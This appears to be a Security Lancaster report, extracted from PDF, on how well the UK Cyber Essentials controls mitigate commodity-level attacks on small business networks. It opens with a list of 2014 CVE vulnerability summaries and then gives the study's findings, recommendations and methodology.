CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 24 of 28

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses



Executive Summary

Findings

This report assesses the effectiveness of the Cyber Essentials controls in mitigating cyber-threats.

Two hundred randomly selected internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.

The aggregated results show that without the Cyber Essentials controls none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.

With the CE tools, more than 99% of the vulnerabilities in the SMEs interviewed were mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approx. 13% of exploits only partially mitigated rely on hardware or software vendors to release patches promptly and effectively to combat any vulnerabilities.

Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, until a patch is released there remains a vulnerability in the network. For this reason, SMEs should frequently consider what services or software are installed, whether they are necessary, and whether a more secure alternative is available.

The few vulnerabilities not mitigated by Cyber Essentials are so because of fundamental hard-coded flaws in hardware or software that cannot be updated or patched to a secure state.

Figure 1: Cyber Essentials Aggregated Vulnerability Mitigation Results

Recommendations

Although the Cyber Essentials tools have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.

The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; we recommend that a follow-up study with a wider scope be carried out to investigate the risks from other forms of attack with the use of Cyber Essentials.

The '10 Steps to Cyber Security' report published by CESG[2] highlights that, in order to maximise the security of a network, it is essential not only to consider the prevention of attacks with the use of tools, but also to ensure that all employees are adequately educated in network security and subject to scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.

For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these pieces of software or hardware be avoided at all costs when developing an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation, of integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP)[4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.

Introduction

Cyber Essentials was introduced as a government funded scheme, first published in April 2014, in the interest of national security, to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilise for the mitigation of the 'bottom 80%' of remote cyber-threats[3].

The scheme, built to provide an implementable form of the 10 Steps to Cyber Security[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is being backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations, including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].

The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].

The Cyber Essentials security controls are summarised as follows[7]:

Firewalls and Gateways: These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, in either hardware or software form, is important for them to be fully effective.

Secure configuration: Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control: Ensuring that only those who should have access to systems have access, and at the appropriate level.

Malware protection: Ensuring that virus and malware protection is installed and is up to date.

Patch management: Ensuring that the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.

Figure 2: Cyber Essentials Security Tools

The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring Your Own Device' network setups in scope, as well as cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as in manufacturing and retail, are applicable to CE but hold additional vulnerabilities, due to their nature, that are not to be considered.

Aims

The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹

To effectively assess Cyber Essentials, it is first necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.

The networks modelled from the collected data are considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted by the adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.

Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can conduct commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.

Data Collection

In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews, and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.

Interviews

The interviews were composed with the goal of first understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.

Survey

The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another publicly to closed groups of security-interested SME representatives.

Vulnerabilities

A total of 200 random vulnerabilities have been taken in equal number from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre². Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre organisation's definition of a vulnerability, which they state as:

An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page[6] in March '15)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials

To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity;

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken, in addition to the randomly chosen 200, and have been assessed to determine to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.

